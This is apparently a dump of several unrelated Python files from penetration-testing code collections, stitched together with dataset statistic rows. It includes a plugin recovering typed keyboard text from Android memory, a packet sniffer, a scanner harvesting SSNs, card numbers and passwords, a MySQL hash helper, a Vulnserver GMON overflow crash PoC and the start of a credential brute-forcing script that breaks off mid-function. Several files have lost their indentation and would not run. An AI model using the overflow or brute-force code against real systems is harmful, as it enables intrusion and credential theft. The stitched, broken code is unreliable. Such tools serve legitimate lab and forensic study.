import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
###################################################################################################
class dalvik_app_lastInput(linux_common.AbstractLinuxCommand):
    """Volatility plugin: recover the last text typed into the LatinIME
    keyboard by walking RichInputConnection instances in the Dalvik heap."""
###################################################################################################
    def __init__(self, config, *args, **kwargs):
        """Register the PID / gDvm-offset options plus our own CLASS_OFFSET option."""
        linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
        dalvik.register_option_PID(self._config)
        dalvik.register_option_GDVM_OFFSET(self._config)
        self._config.add_option('CLASS_OFFSET', short_option = 'c', default = None,
                                help = 'This is the offset (in hex) of system class RichInputConnection.java', action = 'store', type = 'str')
###################################################################################################
    def calculate(self):
        """Yield (instance, text) pairs for each candidate RichInputConnection."""
        # if no gDvm object offset was specified, use this one
        if not self._config.GDVM_OFFSET:
            self._config.GDVM_OFFSET = str(0x41b0)
        # use linux_pslist plugin to find process address space and ID if not specified
        proc_as = None
        tasks = linux_pslist.linux_pslist(self._config).calculate()
        for task in tasks:
            # the AOSP keyboard process is named '...inputmethod.latin'
            if str(task.comm) == "putmethod.latin":
                proc_as = task.get_process_address_space()
                self._config.PID = str(task.pid)
                break
        # use dalvik_loaded_classes plugin to find class offset if not specified
        if not self._config.CLASS_OFFSET:
            classes = dalvik_loaded_classes.dalvik_loaded_classes(self._config).calculate()
            for task, clazz in classes:
                if (dalvik.getString(clazz.sourceFile)+"" == "RichInputConnection.java"):
                    self._config.CLASS_OFFSET = str(hex(clazz.obj_offset))
                    break
        # use dalvik_find_class_instance plugin to find a list of possible class instances
        instance = dalvik_find_class_instance.dalvik_find_class_instance(self._config).calculate()
        for sysClass, inst in instance:
            # get stringBuilder object
            stringBuilder = inst.clazz.getJValuebyName(inst, "mCommittedTextBeforeComposingText").Object.dereference_as('Object')
            # get superclass object (AbstractStringBuilder holds the char array)
            abstractStringBuilder = stringBuilder.clazz.super.dereference_as('ClassObject')
            # array object of super class
            charArray = abstractStringBuilder.getJValuebyName(stringBuilder, "value").Object.dereference_as('ArrayObject')
            # get length of array object
            count = charArray.length
            # create string object with content of the array object
            # (Java chars are UTF-16, hence length = count*2 bytes)
            # NOTE(review): 'contents0' is presumably the first-element field
            # of the ArrayObject vtype -- confirm against the profile.
            text = obj.Object('String', offset = charArray.contents0.obj_offset,
                              vm = abstractStringBuilder.obj_vm, length = count*2, encoding = "utf16")
            yield inst, text
###################################################################################################
    def render_text(self, outfd, data):
        """Print one table row (instance offset, recovered text) per result."""
        self.table_header(outfd, [ ("InstanceClass", "13"),
                                   ("lastInput", "20")
                                 ])
        for inst, text in data:
            self.table_row( outfd,
                            hex(inst.obj_offset),
                            text)
| 50.131868 | 132 | 0.569218 |
Python-Penetration-Testing-Cookbook | import socket
import struct
import textwrap
def get_mac_addr(mac_raw):
    """Format 6 raw bytes as an upper-case, colon-separated MAC address."""
    return ':'.join('{:02x}'.format(octet) for octet in mac_raw).upper()
def format_multi_line(prefix, string, size=80):
    """Hex-escape byte payloads and wrap the text, prefixing every output line."""
    size -= len(prefix)
    if isinstance(string, bytes):
        # render each byte as a literal '\xNN' escape (4 characters)
        string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
        # keep the wrap width even so escapes are not split mid-byte
        if size % 2:
            size -= 1
    wrapped = textwrap.wrap(string, size)
    return '\n'.join(prefix + line for line in wrapped)
def ethernet_head(raw_data):
    """Parse a 14-byte Ethernet frame header.

    Returns (dest_mac, src_mac, byte-swapped ethertype via htons, payload bytes).
    """
    dst_raw, src_raw, proto_be = struct.unpack('! 6s 6s H', raw_data[:14])
    to_mac = lambda raw: ':'.join('{:02x}'.format(b) for b in raw).upper()
    return to_mac(dst_raw), to_mac(src_raw), socket.htons(proto_be), raw_data[14:]
def http(raw_data):
    """Decode an HTTP payload to text, falling back to the raw bytes.

    :param raw_data: payload bytes captured from a TCP segment
    :return: str if the payload is valid UTF-8, otherwise the original bytes
    """
    try:
        return raw_data.decode('utf-8')
    except (UnicodeDecodeError, AttributeError):
        # Narrowed from a bare ``except:``: only decoding failures (or input
        # that is not bytes-like) fall back to returning the data unchanged.
        return raw_data
def icmp_head(raw_data):
    """Parse a 4-byte ICMP header; return (type, code, checksum, payload)."""
    fields = struct.unpack('! B B H', raw_data[:4])
    return fields + (raw_data[4:],)
def ipv4_head(raw_data):
    """Parse an IPv4 header.

    Returns (version+IHL byte, version, header length in bytes, TTL,
    protocol number, source IP, destination IP, payload).
    """
    ver_ihl = raw_data[0]
    version = ver_ihl >> 4
    header_length = (ver_ihl & 0x0F) * 4  # IHL is in 32-bit words
    ttl, proto, src_raw, dst_raw = struct.unpack('! 8x B B 2x 4s 4s', raw_data[:20])
    dotted = lambda raw: '.'.join(str(octet) for octet in raw)
    return (ver_ihl, version, header_length, ttl, proto,
            dotted(src_raw), dotted(dst_raw), raw_data[header_length:])
def get_ip(addr):
    """Format 4 raw bytes as a dotted-quad IPv4 address string."""
    return '.'.join(str(octet) for octet in addr)
def tcp_head(raw_data):
    """Parse a TCP header.

    Returns (src_port, dest_port, seq, ack, URG, ACK, PSH, RST, SYN, FIN, payload);
    each flag is 0 or 1, and the payload starts at the data offset.
    """
    (src_port, dest_port, sequence, acknowledgment,
     offset_reserved_flags) = struct.unpack('! H H L L H', raw_data[:14])
    # data offset is stored in 32-bit words in the top 4 bits
    offset = (offset_reserved_flags >> 12) * 4
    # low-order bits: URG=32, ACK=16, PSH=8, RST=4, SYN=2, FIN=1
    urg, ack, psh, rst, syn, fin = (
        (offset_reserved_flags >> bit) & 1 for bit in (5, 4, 3, 2, 1, 0))
    return (src_port, dest_port, sequence, acknowledgment,
            urg, ack, psh, rst, syn, fin, raw_data[offset:])
def udp_head(raw_data):
    """Parse an 8-byte UDP header; return (src_port, dest_port, length, payload)."""
    src_port, dest_port, size = struct.unpack('! H H 2x H', raw_data[:8])
    return src_port, dest_port, size, raw_data[8:]
def main():
    """Capture raw Ethernet frames forever and pretty-print their headers.

    Uses an AF_PACKET raw socket (Linux only, requires root) and dispatches
    on the EtherType / IPv4 protocol number to the parser helpers above.
    """
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
    while True:
        raw_data, addr = s.recvfrom(65535)
        eth = ethernet_head(raw_data)
        print('\nEthernet Frame:')
        print('Destination: {}, Source: {}, Protocol: {}'.format(eth[0], eth[1], eth[2]))
        if eth[2] == 8:
            ipv4 = ipv4_head(eth[3])
            print('\t -' + 'IPv4 Packet:')
            print('\t\t -' + 'Version: {}, Header Length: {}, TTL: {},'.format(ipv4[1], ipv4[2], ipv4[3]))
            print('\t\t -' + 'Protocol: {}, Source: {}, Target: {}'.format(ipv4[4], ipv4[5], ipv4[6]))
            # TCP
            if ipv4[4] == 6:
                tcp = tcp_head(ipv4[7])
                print('\t -' + 'TCP Segment:')
                print('\t\t -' + 'Source Port: {}, Destination Port: {}'.format(tcp[0], tcp[1]))
                print('\t\t -' + 'Sequence: {}, Acknowledgment: {}'.format(tcp[2], tcp[3]))
                print('\t\t -' + 'Flags:')
                print('\t\t\t -' + 'URG: {}, ACK: {}, PSH: {}'.format(tcp[4], tcp[5], tcp[6]))
                print('\t\t\t -' + 'RST: {}, SYN: {}, FIN:{}'.format(tcp[7], tcp[8], tcp[9]))
                if len(tcp[10]) > 0:
                    # HTTP
                    if tcp[0] == 80 or tcp[1] == 80:
                        print('\t\t -' + 'HTTP Data:')
                        try:
                            # Bug fix: the original did ``http = http(tcp[10])``,
                            # rebinding the module-level http() function to a
                            # string (breaking every later HTTP packet), and then
                            # printed ``http[10]`` -- a single character --
                            # instead of the decoded payload.
                            http_payload = http(tcp[10])
                            http_info = str(http_payload).split('\n')
                            for line in http_info:
                                print('\t\t\t' + str(line))
                        except Exception:
                            print(format_multi_line('\t\t\t', tcp[10]))
                    else:
                        print('\t\t -' + 'TCP Data:')
                        print(format_multi_line('\t\t\t', tcp[10]))
            # ICMP
            elif ipv4[4] == 1:
                icmp = icmp_head(ipv4[7])
                print('\t -' + 'ICMP Packet:')
                print('\t\t -' + 'Type: {}, Code: {}, Checksum: {},'.format(icmp[0], icmp[1], icmp[2]))
                print('\t\t -' + 'ICMP Data:')
                print(format_multi_line('\t\t\t', icmp[3]))
            elif ipv4[4] == 17:
                udp = udp_head(ipv4[7])
                print('\t -' + 'UDP Segment:')
                print('\t\t -' + 'Source Port: {}, Destination Port: {}, Length: {}'.format(udp[0], udp[1], udp[2]))
            # Other IPv4
            else:
                print('\t -' + 'Other IPv4 Data:')
                print(format_multi_line('\t\t', ipv4[7]))
        else:
            print('Ethernet Data:')
            print(format_multi_line('\t', eth[3]))


if __name__ == '__main__':
    # Guard the entry point so importing this module does not start sniffing.
    main()
| 35.413043 | 122 | 0.5 |
cybersecurity-penetration-testing | '''
Copyright (c) 2016 Python Forensics and Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Revision History
v .95 Beta Initial Release (May 2016)
v .90 Alpha Initial Release Command Line Version (November 2015)
Writter for:
Python 2.6.x or greater (not Python 3.x)
pfDiscover Support File
Includes the FileExaminer Class
'''
# Required Python Import Standard Library Modules
import os # OS Module
import re # Regular Expression Modules
import time # Time Module
import traceback # raceback exception Module
# Psuedo Constants
MAXBUFF = 1024 * 1024 * 16 # 16 Megabytes defines the size of
# of the memory chunks read
# Class: FileExaminer Class
#
# Desc: Handles all methods related to File Based Forensics
# Methods constructor: Initializes the Forensic File Object and Collects Basic Attributes
# File Size
# MAC Times
# Reads file into a buffer
# hashFile: Generates the selected one-way hash of the file
# destructor: Deletes the Forensic File Object
class FileExaminer:
# Constructor
    def __init__(self, theFile):
        """Stat *theFile*, record its type/ownership/MAC times, open it for
        reading when possible, and load the zipcode lookup table (zipdb.csv).

        All failures are recorded in self.lastError / self.zipLookup
        rather than raised.
        NOTE(review): 'mactimes' below is never updated again -- the stat
        results go into the differently-cased 'macTimes'; confirm which
        attribute consumers read.
        """
        #Attributes of the Object
        self.lastError = "OK"
        self.mactimes = ["","",""]
        self.fileSize = 0
        self.fileOpen = False
        self.fileType = "unknown"
        self.uid = 0
        self.gid = 0
        self.mountPoint = False
        self.fileRead = False
        self.md5 = ""
        self.sha1 = ""
        self.path = theFile
        self.sha256 = ""
        self.sha512 = ""
        self.zipLookup = False
        self.emailDict = {}   # Create empty dictionaries
        self.ssnDict = {}
        self.urlDict = {}
        self.pwDict = {}
        self.ccDict = {}
        self.usphDict = {}
        self.zipDict = {}
        self.zipDB = {}
        try:
            if os.path.exists(theFile):
                # get the file statistics
                theFileStat = os.stat(theFile)
                # get the MAC Times and store them in a list
                self.macTimes = []
                self.macTimes.append(time.ctime(theFileStat.st_mtime))
                self.macTimes.append(time.ctime(theFileStat.st_atime))
                self.macTimes.append(time.ctime(theFileStat.st_ctime))
                # get and store the File size
                self.fileSize = theFileStat.st_size
                # Get and store the ownership information
                self.uid = theFileStat.st_uid
                self.gid = theFileStat.st_gid
                if os.path.isfile(theFile):
                    self.fileType = "File"
                # Is this a real file?
                elif os.path.islink(theFile):
                    self.fileType = "Link"
                # Is This filename actually a directory?
                elif os.path.isdir(theFile):
                    self.fileType = "Directory"
                else:
                    self.fileType = "Unknown"
                # Is the pathname a mount point?
                if os.path.ismount(theFile):
                    self.mountPoint = True
                else:
                    self.mountPoint = False
                # Is the file Accessible for Read?
                if os.access(theFile, os.R_OK) and self.fileType == "File":
                    # Open the file to make sure we can access it
                    self.fp = open(theFile, 'rb')
                    self.fileOpen = True
                else:
                    self.fileRead = False
                try:
                    # Required zipdb comma separated value
                    # file containing zipcode to city lookup
                    with open("zipdb.csv", 'r') as zipData:
                        for line in zipData:
                            line=line.strip()
                            lineList = line.split(',')
                            if len(lineList) == 3:
                                key = lineList[0]
                                val = lineList[1:]
                                self.zipDB[key] = val
                    self.zipLookup = True
                # NOTE(review): bare except intentionally makes the zip
                # lookup best-effort, but it also hides coding errors.
                except:
                    traceback.print_exc()
                    self.zipLookup = False
            else:
                self.lastError = "File does not exist"
        except:
            self.lastError = "File Exception Raised"
# Function to Iterate through a large file
# the file was opened during init
def readBUFF(self):
# Read the next MAXBUFF-sized chunk from the handle opened in __init__
# and return it with every non-searchable character blanked to a space.
# An empty return value signals EOF to the iter(..., '') loop in scanMem.
# NOTE(review): Python-2 semantics assumed -- re.sub() with a str pattern
# over a bytearray (and the '' sentinel used by the caller) breaks on
# Python 3; confirm interpreter version before reuse.
# Read in a bytearray
ba = bytearray(self.fp.read(MAXBUFF))
# substitute spaces for all non-ascii characters
# this improves the performance and accuracy of the
# regular expression searches
txt = re.sub('[^A-Za-z0-9 ~!@#$%^&*:;<>,.?/\-\(\)=+_]', ' ', ba)
# Return the resulting text string that will be searched
return txt
#searches file for patterns matching
# e-mails
# SSN
# URL
# U.S. Phone Numbers
# U.S. Postal Codes
# Strong Passwords
# Credit Card Numbers
def scanMem(self, quiet):
if not quiet:
print "\nScanning Memory Image "
# compile the regular expressions
usphPattern = re.compile(r'(1?(?: |\-|\.)?(?:\(\d{3}\)|\d{3})(?: |\-|\.)?\d{3}(?: |\-|\.)?\d{4})')
emailPattern = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}')
ssnPattern = re.compile(r'\d{3}-\d{2}-\d{4}')
urlPattern = re.compile(r'\w+:\/\/[\w@][\w.:@]+\/?[\w\.?=%&=\-@/$,]*')
pwPattern = re.compile(r'[A-Za-z0-9~!@#$%^&*;:]{6,12}')
ccPattern = re.compile(r'(3[47]\d{2}([ -]?)(?!(\d)\3{5}|123456|234567|345678)\d{6}\2(?!(\d)\4{4})\d{5}|((4\d|5[1-5]|65)\d{2}|6011)([ -]?)(?!(\d)\8{3}|1234|3456|5678)\d{4}\7(?!(\d)\9{3})\d{4}\7\d{4})')
zipPattern = re.compile(r'(?!00[02-5]|099|213|269|34[358]|353|419|42[89]|51[789]|529|53[36]|552|5[67]8|5[78]9|621|6[348]2|6[46]3|659|69[4-9]|7[034]2|709|715|771|81[789]|8[3469]9|8[4568]8|8[6-9]6|8[68]7|9[02]9|987)\d{5}')
cnt = 0
gbProcessed = 0
# Iterate through the file one chunk at a time
for bArray in iter(self.readBUFF, ''):
# Provides user feedback one dot = 16MB Chunk Processed
if not quiet:
if cnt < 64:
cnt +=1
print '.',
else:
# Print GB processed
gbProcessed += 1
print
print "GB Processed: ", gbProcessed
cnt = 0
# Perform e-mail search
try:
# email
partialResult = emailPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.emailDict:
curValue = self.emailDict[key]
curValue +=1
self.emailDict[key] = curValue
else:
curValue = 1
self.emailDict[key] = curValue
except:
traceback.print_exc()
curValue = 1
self.emailDict[key] = curValue
# Search for Strong Passwords
try:
# Password
partialResult = pwPattern.findall(bArray)
for key in partialResult:
key = str(key)
upper=0
lower=0
number=0
special=0
for eachChr in key:
if eachChr in "abcdefghijklmnopqrstuvwxyz":
lower = 1
elif eachChr in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
upper = 1
elif eachChr in '1234567890':
number = 1
elif eachChr in '~!@#$%^&*':
special = 1
if upper == 1 and lower == 1 and number == 1:
# Keep track of the number of occurrences
if key in self.pwDict:
curValue = self.pwDict[key]
curValue +=1
self.pwDict[key] = curValue
else:
curValue = 1
self.pwDict[key] = curValue
except:
curValue = 1
self.emailDict[key] = curValue
# Search for possible SS#
try:
# ssn
partialResult = ssnPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.ssnDict:
curValue = self.ssnDict[key]
curValue +=1
self.ssnDict[key] = curValue
else:
curValue = 1
self.ssnDict[key] = curValue
except:
curValue = 1
self.ssnDict[key] = curValue
# Search for URL's
try:
# url
partialResult = urlPattern.findall(bArray)
for key in partialResult:
key = str(key)
if key in self.urlDict:
curValue = self.urlDict[key]
curValue +=1
self.urlDict[key] = curValue
else:
curValue = 1
self.urlDict[key] = curValue
except:
curValue = 1
self.urlDict[key] = curValue
# Search for Credit Cards
try:
# Credit Card
partialResult = ccPattern.findall(bArray)
# Keep track of the number of occurrences
for key in partialResult:
key=str(key[0])
key = key.translate(None, '- ')
if key in self.ccDict:
curValue = self.ccDict[key]
curValue +=1
self.ccDict[key] = curValue
else:
curValue = 1
self.ccDict[key] = curValue
except:
curValue = 1
self.ccDict[key] = curValue
# Search for Phone Numbers
try:
# Phone Number
partialResult = usphPattern.findall(bArray)
for key in partialResult:
key = str(key)
key = key.strip()
if key[0] in '23456789\(':
# Keep track of the number of occurrences
if key in self.usphDict:
curValue = self.usphDict[key]
curValue +=1
self.usphDict[key] = curValue
else:
curValue = 1
self.usphDict[key] = curValue
except:
curValue = 1
self.usphDict[key] = curValue
# Search for valid US Postal Codes
try:
# Valid US Postal Codes
partialResult = zipPattern.findall(bArray)
for key in partialResult:
key = str(key)
# Keep track of the number of occurrences
if key in self.zipDict:
curValue = self.zipDict[key]
curValue +=1
self.zipDict[key] = curValue
else:
curValue = 1
self.zipDict[key] = curValue
except:
curValue = 1
self.zipDict[key] = curValue
return True
def printEmails(self):
print "\nPossible E-Mails"
print "================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printURLs(self):
print "\nPossible URLs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printSSNs(self):
print "\nPossible SSNs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printPWs(self):
print "\nPossible PWs"
print "=============\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printCCs(self):
print "\nPossible Credit Card #s"
print "=======================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printUSPHs(self):
print "\nPossible U.S. Phone #s"
print "=====================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def printZIPs(self):
print "\nPossible Valid U.S. Postal Codes"
print "================================\n"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
print '%5d' % entry[1], '%s' % entry[0], '%s' % valList[0], '%s' % valList[1]
else:
for entry in sortedList:
print '%5d' % entry[1], '%s' % entry[0]
def csvEmails(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvEmail.csv", 'w')
tempList = ['Count', 'Possible E-mails']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvEmail.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.emailDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvURLs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvURL.csv", 'w')
tempList = ['Count', 'Possible URLs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvURL.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.urlDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvSSNs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvSSN.csv", 'w')
tempList = ['Count', 'Possible SSNs']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvSSN.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ssnDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvPWs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvPW.csv", 'w')
tempList = ['Count', 'Possible Strong Passwords']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvPW.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.pwDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvCCs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvCC.csv", 'w')
tempList = ['Count', 'Possible Credit Cards']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvCC.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.ccDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
def csvUSPHs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvUSPH.csv", 'w')
tempList = ['Count', 'Possible U.S. Phone Numbers']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvUSPH.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.usphDict.items()], reverse = True)]
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def csvZIPs(self):
# Open CSV File and Write Header Row
try:
csvFile = open("csvZIP.csv", 'w')
tempList = ['Count', 'Possible Valid U.S.Postal Codes']
outStr = ",".join(tempList)
csvFile.write(outStr)
csvFile.write("\n")
except:
print "Cannot Open File for Write: csvZIP.csv"
sortedList = [(k,v) for v,k in sorted([(v,k) for k,v in self.zipDict.items()], reverse = True)]
# If the zipLookup Dictionary is available
# Obtain the associated City
# if lookup fails, skip possible ZipCode
if self.zipLookup:
for entry in sortedList:
if entry[0] in self.zipDB:
valList = self.zipDB[entry[0]]
outStr = ",".join([str(entry[1]), entry[0], valList[0], valList[1]])
csvFile.write(outStr)
csvFile.write("\n")
else:
for entry in sortedList:
outStr = ",".join([str(entry[1]), entry[0]])
csvFile.write(outStr)
csvFile.write("\n")
csvFile.close()
def __del__(self):
    # Nothing to release explicitly here; the interpreter reclaims the
    # open file handle when the instance is collected.
    pass
# End Forensic File Class ====================================
| 37.24055 | 234 | 0.439676 |
PenTesting | from hashlib import sha1
import struct
def hash(word, salt):
# Return a one-entry dict mapping the MySQL-style "*<scramble>" hash of
# *word* (salted with *salt*) back to the plaintext, ready for merging
# into a reverse-lookup table.
# NOTE(review): shadows the builtin hash(); name kept for existing callers.
return {"*%s"%_scramble(word,salt):word}
def _scramble(password, salt):
    # MySQL 4.1+ password scramble: stage1 = SHA1(password),
    # stage2 = SHA1(stage1), then SHA1(salt || stage2) XOR'd against
    # stage1 by _my_crypt.
    stage1 = sha1(password).digest()
    stage2 = sha1(stage1).digest()
    mixer = sha1()
    mixer.update(salt)
    mixer.update(stage2)
    return _my_crypt(mixer.digest(), stage1)
def _my_crypt(message1, message2):
    # Byte-wise XOR of two equal-length digests, prefixed with a single
    # length byte -- the scrambled-password wire format.
    # Fix: xrange() only exists on Python 2; range() behaves identically
    # here and keeps the helper usable on Python 3 as well.
    length = len(message1)
    result = struct.pack('B', length)
    for i in range(length):
        x = (struct.unpack('B', message1[i:i+1])[0] ^
             struct.unpack('B', message2[i:i+1])[0])
        result += struct.pack('B', x)
    return result
| 23.96 | 55 | 0.603531 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import os
import sys
import socket
# Default target host/port; start_me() overrides these from
# sys.argv[1] / sys.argv[2] when supplied.
ipAddr="192.168.1.104"
ipPort=9999
def start_me():
    # PoC crash trigger for the Vulnserver GMON command: connect to the
    # target, read the banner, then send GMON followed by a 5000-byte
    # marker pattern (1000 x each of A..E) to overflow the handler and
    # make the crash offset easy to locate in a debugger.
    # Target host/port come from the module globals, overridable via
    # argv[1] / argv[2].
    try:
        global ipAddr
        global ipPort
        command = "GMON ./:/"
        for marker in ("A", "B", "C", "D", "E"):
            command = command + marker * 1000
        # Fix: the original compared sys.argv entries against None with
        # '!=' -- a missing argument actually raises IndexError (silently
        # swallowed by a bare except) and None is never seen.  Check the
        # argument count explicitly instead.
        if len(sys.argv) >= 3:
            ipAddr = sys.argv[1]
            ipPort = sys.argv[2]
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((ipAddr, int(ipPort)))
            rec = sock.recv(1024)
            print('Rec Banner initially is : ' + str(rec))
            sock.send(command)
            rec = sock.recv(1024)
            print('Rec after is : ' + str(rec))
        finally:
            # Fix: the original leaked the socket.
            sock.close()
    except Exception as ex:
        print("Exception : " + str(ex))
# Entry point: fire the PoC immediately when the script runs.
start_me()
| 20.076923 | 55 | 0.649208 |
Penetration-Testing-Study-Notes | #!/usr/bin/python
###################################################
#
# CredCheck - written by Justin Ohneiser
# ------------------------------------------------
# Inspired by reconscan.py by Mike Czumak
#
# This program will check a set of credentials
# against a set of IP addresses looking for
# valid remote login access using two steps:
# 1. Light NMAP scan -> to identify services
# 2. Modular brute force for each service
#
# [Warning]:
# This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
# I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
# functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
# target machines in a lab environment so please only use it against systems for which you have permission!!
#-------------------------------------------------------------------------------------------------------------
# [Modification, Distribution, and Attribution]:
# You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
# author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
# worth anything anyway :)
#
# Designed for use in Kali Linux 4.6.0-kali1-686
###################################################
import os, sys, subprocess
class bcolors:
# ANSI terminal escape sequences used to colour the console status
# output (ENDC resets the attributes).
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Per-attempt cap in seconds, handed to the `timeout` wrapper around
# each hydra/ncrack/medusa/acccheck invocation.
TIMECAP = 60
# ------------------------------------
# Toolbox
# ------------------------------------
def printHeader():
# Print the CredCheck banner once at program start.
print ""
print "###################################################"
print "## CredCheck"
print "##"
print "###################################################"
print ""
def printUsage():
# Print the one-line usage string, deriving the program name from the
# last path component of how the script was invoked.
print "Usage: \t%s <user:pass | userpass-file> <target | target-file>" % sys.argv[0].split("/")[len(sys.argv[0].split("/"))-1]
def printPlus(message):
# Green "[+]" line: a successful credential / positive result.
print bcolors.OKGREEN + "[+] " + message + bcolors.ENDC
def printMinus(message):
# Plain "[-]" line: a failed attempt.
print "[-] " + message
def printStd(message):
# Plain "[*]" informational line.
print "[*] " + message
def printStdSpecial(message):
# Yellow "[*]" line: section/progress announcements.
print bcolors.WARNING + "[*] " + message + bcolors.ENDC
def printErr(message):
# Red "[!]" line: errors.
print bcolors.FAIL + "[!] " + message + bcolors.ENDC
def printDbg(message):
# Blue "[-]" line: debug / skipped-service notices.
print bcolors.OKBLUE + "[-] " + message + bcolors.ENDC
def parseNmapScan(results):
    # Parse plain `nmap` stdout and group open ports by service name.
    # results: the raw scan output as one string.
    # Returns {service_name: ["port/proto", ...]}.
    services = {}
    for line in results.split("\n"):
        line = line.strip()
        # Keep only open tcp/udp port rows; skip filtered ports and NSE
        # "Discovered ..." chatter.
        if ("tcp" in line or "udp" in line) and ("open" in line) and \
                not ("filtered" in line) and not ("Discovered" in line):
            # Fix: the original collapsed space runs with
            #   while " " in line: line = line.replace(" ", " ")
            # a no-op replace that loops forever on any line containing a
            # space.  split() tokenises on arbitrary whitespace instead.
            fields = line.split()
            if len(fields) < 3:
                # malformed row; previously an uncaught IndexError
                continue
            port = fields[0]
            service = fields[2]
            services.setdefault(service, []).append(port)
    return services
def dispatchModules(target, services, userpasses):
# Route every discovered service to its brute-force module via the
# KNOWN_SERVICES table; services without a module are reported and
# skipped.  'ports' is passed through to the module unchanged.
for service in services:
ports = services[service]
if service in KNOWN_SERVICES:
try:
KNOWN_SERVICES[service](target, ports, userpasses)
# NOTE(review): AttributeError here is treated the same as an
# unknown service name.
except AttributeError:
printDbg("No module available for %s - %s" % (service, ports))
else:
printDbg("No module available for %s - %s" % (service, ports))
def validateIp(s):
    # True when *s* is a dotted-quad IPv4 address: exactly four fields,
    # each an unsigned decimal in 0..255 (leading zeros are accepted,
    # matching the original isdigit()-based check).
    octets = s.split('.')
    if len(octets) != 4:
        return False
    for octet in octets:
        if not octet.isdigit():
            return False
        if not 0 <= int(octet) <= 255:
            return False
    return True
def validateUserpass(userpass):
    # True when *userpass* is a single "user:pass" pair, i.e. contains
    # exactly one colon (either side may be empty, as in the original).
    return len(userpass.split(":")) == 2
def isWindows(target):
# Return True when the smb-os-discovery NSE script reports a Windows
# OS on the target's port 445; used to gate the pass-the-hash attempt.
